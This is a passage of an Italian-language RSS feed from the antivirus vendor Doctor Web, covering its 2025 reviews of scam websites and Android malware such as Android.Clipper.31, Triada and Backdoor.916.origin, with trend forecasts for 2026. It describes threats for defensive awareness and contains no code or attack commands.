        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno dei siti truffa che offrivano l'accesso a una "piattaforma di investimento" su base di tecnologie di intelligenza artificiale presumibilmente era legato ad Apple corporation&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Molti di questi siti sono costruiti sulla base di modelli simili sotto forma di falsa chat con un "assistente virtuale" o un "collaboratore" di una determinata azienda, a cui nome presumibilmente i truffatori comunicano con la potenziale vittima. Agli utenti viene suggerito di rispondere a una serie di domande e quindi fornire i dati personali.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Su uno dei siti i malintenzionati suggerivano agli utenti da Francia di ottenere l'accesso a un software di trading automatizzato inesistente, TraderAI, che presumibilmente consentirà di guadagnare da 3.500 €&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Una delle risorse pubblicizzava un servizio di investimento, presumibilmente costruito direttamente sulla base del servizio di messaggistica Telegram. Il sito prometteva un reddito di 10.000 € al mese dal trading automatico sulle azioni di aziende globali "direttamente nel browser telefonico".&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Sito dei truffatori invita a unirsi alla "piattaforma Telegram" che presumibilmente eseguirebbe il trading su azioni in autonomo&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I malintenzionati proponevano, inoltre, alle potenziali vittime di guadagnare tramite i "bot di trading", presumibilmente creati con la partecipazione di grandi aziende e servizi, quale Telegram, WhatsApp, TikTok e altri ancora&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di sito che invitava a utilizzare un bot di trading inesistente, presumibilmente legato al sistema di messaggistica WhatsApp&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Durante il 2025, i nostri analisti internet hanno rilevato nuovi siti fraudolenti che invitavano a investire nel settore petrolifero e del gas gli utenti da molti paesi, inclusi Russia, paesi CSI ed europei. Su tali siti, nella maggior parte dei casi, alle potenziali vittime anche vengono chieste le informazioni personali: nome, cognome, numero di cellulare, indirizzo email ecc.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Sito fraudolento volto ai cittadini di Kirghizistan suggerisce loro di "guadagnare con il petrolio e gas" promettendo un cospicuo reddito&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Comparivano nuovamente i siti truffa che suggerivano di ottenere un "sostegno statale" sotto forma di bonus o compensazioni. Ad esempio, nel segmento di internet russo erano diffuse le risorse truffa presumibilmente legate al portale web dei servizi statali Gosuslugi.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di sito truffa, presumibilmente legato al servizio web Gosuslugi, che prometteva agli utenti russi pagamenti stabili da parte dello Stato e di una grande compagnia petrolifera e del gas. Per "partecipare" al programma dei pagamenti, alla vittima veniva chiesto di fornire i dati personali&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I nostri specialisti hanno registrato anche la comparsa di ulteriori siti di falsi progetti di formazione. Invitavano gli utenti a seguire vari corsi di formazione per migliorare la propria alfabetizzazione finanziaria, imparare una determinata professione ecc. Per "accedere" alla formazione, le potenziali vittime, come in molti altri schemi simili, anche dovevano fornire le loro informazioni personali.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/14_scam_study_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/14_scam_study_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno dei siti truffaldini invitava a imparare l'inglese&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Gli analisti internet Doctor Web rivelavano nuovi siti fraudolenti per la vendita di biglietti teatrali. Su tali risorse i malintenzionati suggeriscono alle potenziali vittime di acquistare biglietti a prezzi convenienti, tuttavia, dopo averli pagati, gli utenti non li ricevono.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di sito truffa che vende biglietti teatrali inesistenti&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Oltre a ciò, si sono diffusi anche nuovi falsi siti di cinema privati. Come nel caso dei biglietti teatrali, alle potenziali vittime viene proposto di acquistare biglietti cinematografici, ma in fin dei conti loro solo consegnano i propri soldi ai malintenzionati.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Falso sito di uno dei cinema privati&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Per dispositivi mobili&lt;/h3&gt;

&lt;p&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel 2025 gli utenti di Android il più spesso riscontravano i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, nonché i programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, che invece di fornire le funzionalità dichiarate, possono caricare vari siti web, inclusi quelli malevoli e fraudolenti. Si registrava una crescita dell'attività delle applicazioni trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;. Rappresentano minacce multifunzionali che i malintenzionati incorporano nel firmware di dispostivi Android. Oltre a ciò, si osservava una crescita del numero di attacchi dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Allo stesso tempo, è diminuita l'attività dei banker &lt;b&gt;Android.SpyMax&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Nell'anno passato gli attori di minacce hanno continuato a utilizzare le varie tecniche di protezione dei malware per SO Android. Una di esse era il metodo di conversione di codice DEX in codice C (conosciuto come DCC o DEX to C).&lt;/p&gt;

&lt;p&gt;Le applicazioni indesiderate più diffuse sono stati i programmi &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;. Suggeriscono agli utenti di completare vari compiti in cambio di premi virtuali e promettono la possibilità di convertire la ricompensa in denaro reale. Ma in realtà, in essi non c'è questa possibilità. Oltre a ciò, venivano frequentemente rilevate sui dispositivi protetti le applicazioni &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;. Quelle prime imitano il funzionamento di antivirus e rilevano minacce inesistenti, offrendo "l'eliminazione" dell'infezione dopo l'acquisto di una versione completa. Quelle seconde rappresentano applicazioni che sono state modificate tramite un popolare servizio cloud. Durante la modifica ad esse vengono aggiunti autorizzazioni di sistema pericolose e un codice offuscato il cui scopo non può essere controllato.&lt;/p&gt;

&lt;p&gt;I programmi modificati tramite l'utility NP Manager (vengono rilevati come &lt;b&gt;Tool.NPMod&lt;/b&gt;) sono stati i software potenzialmente pericolosi più diffusi. L'utility offusca il codice delle applicazioni modificate e consente di aggirare il controllo della loro firma digitale. Risultano i programmi pubblicitari più attivi nel 2025 le mod di WhatsApp estranee (&lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;) che aprono automaticamente link pubblicitari durante l'uso dell'app di messaggistica.&lt;/p&gt;

&lt;p&gt;Nel 2025 sono stati rivelati nuovi casi di infezione dei firmware di dispositivi Android. La nostra azienda ha avvisato di uno di tali casi ad aprile. I malintenzionati hanno preinstallato un'applicazione malevola, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, nell'area di sistema di alcuni modelli di smartphone economici, e con l'ausilio di essa rubavano la criptovaluta degli utenti. Altri attaccanti hanno potuto incorporare i pericolosi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; nel firmware di altri modelli di smartphone Android. Oltre a ciò, sono stati registrati ulteriori casi di infezione dei firmware di TV box Android da nuove versioni del trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, che la nostra azienda &lt;a href="https://news.drweb-av.it/show/?i=14900" target="_blank"&gt;ha scoperto&lt;/a&gt; nel 2024.&lt;/p&gt;

&lt;p&gt;Nel corso dell'anno passato, il laboratorio antivirus Doctor Web ha individuato una serie di applicazioni malevole pericolose. Ad aprile abbiamo parlato del trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, che era nascosto in un programma cartografico modificato da attori di minacce, Alpine Quest, e attaccava i militari russi. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; trasmetteva ai malintenzionati dati sul numero di cellulare e sugli account, raccoglieva i contatti dalla rubrica, la geolocalizzazione del dispositivo infetto ed informazioni sui file in esso memorizzati. Era in grado, inoltre, di rubare determinati file su comando degli attaccanti. In particolare, a loro interessavano documenti riservati trasmessi tramite servizi di messaggistica, nonché il file di log delle localizzazioni del programma Alpine Quest.&lt;/p&gt;

&lt;p&gt;Ad agosto i nostri specialisti hanno avvertito del backdoor &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; che i malintenzionati distribuivano sotto le apparenze di un antivirus attraverso messaggi privati nelle app di messaggistica. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; ruba informazioni confidenziali e consente di spiare gli utenti. L'obiettivo principale di questo backdoor erano i collaboratori del business russo.&lt;/p&gt;

&lt;p&gt;Ad ottobre abbiamo informato di un backdoor multifunzionale, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, individuato dai nostri analisti dei virus in versioni modificate del programma di messaggistica Telegram X. Anche questo malware viene utilizzato per il furto di dati confidenziali, inclusi i login e le password di Telegram, gli SMS in arrivo, la corrispondenza nell'app di messaggistica e dati dagli appunti. Oltre a ciò, il backdoor consente ai malintenzionati di gestire completamente il programma di messaggistica e controllare l'account Telegram hackerato della vittima. Per gestire il backdoor, i cybercriminali utilizzavano sia il server C2 che il database Redis, il che in precedenza non si osservava nelle minacce Android. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; predominantemente era mirato agli abitanti di Indonesia e Brasile.&lt;/p&gt;

&lt;p&gt;Per maggiori informazioni sulla situazione di virus per dispositivi mobili nel 2025 leggete la nostra &lt;a href="https://news.drweb-av.it/show/?i=15104" target="_blank"&gt;panoramica&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;Prospettive e probabili tendenze&lt;/h3&gt;

&lt;p&gt;Nel nuovo anno 2026, una delle minacce per gli utenti più diffuse probabilmente rimarranno i trojan pubblicitari, tramite cui i malintenzionati ottengono un reddito illegale. Ci si può aspettare che i cybercriminali utilizzeranno più spesso le applicazioni trojan bancarie, le quali anche permettono loro di arricchirsi.&lt;/p&gt;

&lt;p&gt;È possibile un'ulteriore crescita della popolarità dei vari strumenti e metodi che aiutano a nascondere l'attività malevola. Possiamo evidenziare tra questi l'utilizzo dei packer e programmi di offuscamento, programmi malevoli dropper e downloader a più fasi, nonché l'impiego della steganografia per l'occultamento del payload. Oltre a ciò, nel corso della creazione di malware, i cybercriminali, anche aventi poca esperienza nella programmazione, sempre più spesso ricorreranno agli assistenti di intelligenza artificiale. Come risultato, compariranno nuove famiglie di malware, e il numero di minacce crescerà.&lt;/p&gt;

&lt;p&gt;Di nuovo saranno sotto mira gli enti pubblici e le imprese, il che porterà a ulteriori attacchi mirati. Sono probabili, inoltre, nuovi casi di infezione dei firmware di smartphone Android, TV box e altri tipi di dispositivi mobili, specialmente nel segmento economico. Persisterà l'attività dei truffatori internet.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15104&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per dispositivi mobili per l'anno 2025</title><link>https://news.drweb-av.it/show/?i=15104&amp;lng=it&amp;c=5</link><pubDate>Thu, 15 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;15 gennaio 2026&lt;/b&gt;&lt;/p&gt;

&lt;h3&gt;In primo piano&lt;/h3&gt;

&lt;p&gt;&lt;newslead&gt;Nel 2025 gli utenti di dispositivi Android il più spesso riscontravano i trojan pubblicitari, nonché i programmi falsificazione utilizzati per scopi fraudolenti.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;I software indesiderati più diffusi, come anche l'anno precedente, sono state le applicazioni che suggeriscono in forma di gioco di completare determinati compiti e ricevere per questo premi virtuali. Promettono la possibilità di convertire la ricompensa in denaro reale, ma in realtà nei programmi tale possibilità non è prevista.&lt;/p&gt;

&lt;p&gt;Tra i software potenzialmente pericolosi, la maggiore attività si osservava da parte delle applicazioni modificate tramite l'utility NP Manager. Essa offusca e protegge dall'analisi e dal rilevamento il codice dei programmi che vengono modificati, nonché consente di aggirare il controllo della firma digitale dopo la loro modifica. I programmi pubblicitari più frequentemente rilevati sono state le mod non ufficiali del programma di messaggistica WhatsApp che aprono automaticamente link pubblicitari durante l'uso dell'app.&lt;/p&gt;

&lt;p&gt;L'anno passato sono stati registrati nuovi casi di incorporazione di programmi malevoli nel firmware di vari modelli di dispostivi Android. Abbiamo riferito uno di tali casi in primavera 2025. I cybercriminali hanno potuto preinstallare un trojan, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, su alcuni modelli di smartphone economici, e con il suo ausilio rubare la criptovaluta delle vittime.&lt;/p&gt;

&lt;p&gt;Inoltre, in primavera i nostri specialisti hanno rilevato un programma trojan, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, che gli attori di minacce avevano integrato in una delle versioni modificate del software cartografico Alpine Quest. L'applicazione malevola era mirata ai militari russi e veniva utilizzata per il cyberspionaggio.&lt;/p&gt;

&lt;p&gt;Alla fine di estate il laboratorio antivirus Doctor Web ha informato di un backdoor, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, che veniva distribuito tramite i popolari programmi di messaggistica istantanea. I malintenzionati lo utilizzavano per spiare dipendenti di aziende russe e raccogliere le loro informazioni confidenziali.&lt;/p&gt;

&lt;p&gt;In autunno abbiamo parlato di un pericoloso backdoor, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, incorporato dai criminali informatici in mod del programma di messaggistica Telegram X Questo programma malevolo permetteva di violare gli account Telegram delle vittime e gestire l'applicazione di messaggistica stessa a nome degli utenti.&lt;/p&gt;

&lt;p&gt;Negli ultimi 12 mesi, il laboratorio antivirus Doctor Web ha rilevato sullo store di app Google Play più di 180 minacce, che in totale sono state scaricate oltre 2.165.000 volte. Includevano varianti diverse dei trojan che abbonano utenti a servizi a pagamento, i programmi falsificazione adoperati per scopi fraudolenti, nonché nuovi software pubblicitari e indesiderati.&lt;/p&gt;

&lt;p&gt;Nel 2025 gli autori di virus hanno continuato a utilizzare varie tecniche volte a complicare l'analisi dei programmi malevoli Android e aggirare il loro rilevamento da parte degli antivirus. Uno dei popolari metodi era la conversione di codice DEX in codice C. Inoltre, i nostri analisti dei virus hanno osservato che nella creazione di software malevoli i malintenzionati utilizzano gli assistenti AI, che aiutano a scrivere codice.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;TENDENZE DELL'ANNO PASSATO&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Trojan pubblicitari di nuovo sono le minacce Android più diffuse&lt;/li&gt;
        &lt;li&gt;Cresciuta la popolarità dell'utility NP Manager, che offusca il codice delle app Android modificate e consente di aggirare il controllo della loro firma digitale dopo la modifica&lt;/li&gt;
        &lt;li&gt;Aumentata l'attività dei trojan bancari&lt;/li&gt;
        &lt;li&gt;Rivelati nuovi casi di infezione dei firmware di dispositivi Android&lt;/li&gt;
        &lt;li&gt;Cybercriminali hanno continuato a utilizzare sia le tecniche già conosciute che quelle nuove di protezione dei malware dal rilevamento e analisi&lt;/li&gt;
        &lt;li&gt;Autori di virus utilizzavano attivamente assistenti AI per scrivere codice di applicazioni malevole&lt;/li&gt;
        &lt;li&gt;Comparsa di nuove minacce sullo store di app Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Eventi più interessanti del 2025&lt;/h3&gt;

&lt;p&gt;Ad aprile dell'anno passato gli esperti Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15002" target="_blank"&gt;hanno individuato&lt;/a&gt; una campagna per il furto di criptovalute ai proprietari di dispositivi Android. I malintenzionati hanno ottenuto l'accesso alla catena di fornitura di una serie di produttori cinesi e hanno incorporato nel firmware di alcuni modelli di smartphone economici un programma trojan, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;. Gli attori di minacce l'hanno integrato in una versione modificata dell'app di messaggistica istantanea WhatsApp. Per la modifica è stato utilizzato lo strumento &lt;a href="https://github.com/LSPosed/LSPatch" target="_blank"&gt;LSPatch&lt;/a&gt;, che permette di cambiare la logica di funzionamento di applicazioni senza modificare il loro codice.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; intercetta i messaggi inviati e ricevuti nell'app di messaggistica, cerca in essi gli indirizzi di portafogli delle criptovalute Tron ed Ethereum, e li sostituisce con gli indirizzi appartenenti agli attaccanti. Allo stesso tempo, il trojan occulta la sostituzione furtiva, e in tali messaggi alle vittime vengono visualizzati i portafogli corretti. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; inoltre invia ai malintenzionati tutte le immagini in formato &lt;em&gt;jpg&lt;/em&gt;, &lt;em&gt;png&lt;/em&gt; e &lt;em&gt;jpeg&lt;/em&gt; per la ricerca in esse delle frasi mnemoniche salvate che consentono di ottenere l'accesso ai portafogli crypto. I cybercriminali hanno incorporato &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; anche in decine di altri programmi, tra cui erano popolari applicazioni di portafoglio crypto, scanner di codici QR e altre app di messaggistica, incluso Telegram. Queste varianti venivano distribuite attraverso siti malevoli.&lt;/p&gt;

&lt;p&gt;Nel 2025 venivano registrati anche altri casi di infiltrazione di malware nell'area di sistema di dispostivi Android. Ad esempio, un altro gruppo di malintenzionati è riuscito a integrare nuove versioni dei pericolosi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; nel firmware di una serie di smartphone economici. I malware Triada sono pericolosi per la loro capacità di infettare il processo di sistema Zygote. Quest'ultimo partecipa direttamente all'avvio di tutte le applicazioni nel sistema, pertanto, anche i trojan Triada successivamente possono integrarsi in qualsiasi app sul dispositivo, in effetti ottenendone il completo controllo. I malintenzionati utilizzano questi trojan per scaricare e installare altri programmi malevoli, nonché applicazioni indesiderate e pubblicitarie. Oltre a ciò, tramite di essi, loro possono spiare le vittime, abbonarle a servizi a pagamento ecc. Sono stati rilevati anche nuovi casi di infezione dei firmware di TV box su base Android da nuove versioni del trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, che la nostra azienda &lt;a href="https://news.drweb-av.it/show/?i=14900" target="_blank"&gt;ha scoperto&lt;/a&gt; nel 2024. Vo1d rappresenta un backdoor che colloca i propri componenti nell'area di sistema dei dispositivi infetti e su comando degli attaccanti è in grado di scaricare e installare di nascosto software di terze parti.&lt;/p&gt;

&lt;p&gt;Inoltre, ad aprile il nostro laboratorio antivirus &lt;a href="https://news.drweb-av.it/show/?i=15006" target="_blank"&gt;ha registrato&lt;/a&gt; una campagna per la distribuzione di un trojan spia, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, mirato ai militari russi. I malintenzionati hanno integrato il malware in una delle versioni del software cartografico Alpine Quest e distribuivano la mod tramite un canale Telegram da loro creato, spacciato per quello ufficiale, nonché tramite uno degli store di app Android russi.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/01_Android.Spy.1292.origin_tg_group_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/01_Android.Spy.1292.origin_tg_group_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Canale Telegram attraverso cui i malintenzionati distribuivano la mod di Alpine Quest malevola contenente &lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; trasmetteva ai cybercriminali dati sugli account e sul numero di cellulare, i contatti dalla rubrica, la geolocalizzazione del dispositivo infetto ed informazioni sui file in esso memorizzati. Il trojan era in grado di rubare determinati file su comando degli attaccanti. A loro interessavano documenti riservati che gli utenti inviavano tramite popolari servizi di messaggistica, nonché il file di log delle localizzazioni dell'app Alpine Quest.&lt;/p&gt;

&lt;p&gt;Ad agosto &lt;a href="https://news.drweb-av.it/show/?i=15047" target="_blank"&gt;abbiamo riferito&lt;/a&gt; casi di distribuzione di un backdoor, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; tramite messaggi privati nelle popolari app di messaggistica. Gli attaccanti suggerivano alle potenziali vittime di installare un "antivirus" dal file APK allegato ai messaggi, in cui in realtà era nascosto il programma malevolo. Il nostro laboratorio antivirus ha scoperto le prime versioni di &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; a gennaio 2025 e da quel momento seguiva la sua attività, il che ha permesso di individuare prontamente questa campagna.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/02_Android.Backdoor.916.origin_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/02_Android.Backdoor.916.origin_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/03_Android.Backdoor.916.origin_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/03_Android.Backdoor.916.origin_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt; trae in inganno gli utenti imitando il funzionamento di un antivirus&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Dopo l'installazione sul dispositivo Android, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; consente di rubare informazioni confidenziali e spiare l'utente. Ad esempio, tramite il backdoor i malintenzionati possono ascoltare conversazioni, trasmettere la trasmissione dalla videocamera, tracciare la posizione e rubare il contenuto dalle app di messaggistica e dal browser. Oltre a questo, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; realizza la funzionalità di keylogger per l'intercettazione dei testi digitati, incluse password. Secondo le valutazioni dei nostri specialisti, il backdoor viene impiegato in attacchi mirati e non è destinato alla distribuzione di massa. L'obiettivo principale per i cybercriminali sono i dipendenti di aziende russe.&lt;/p&gt;

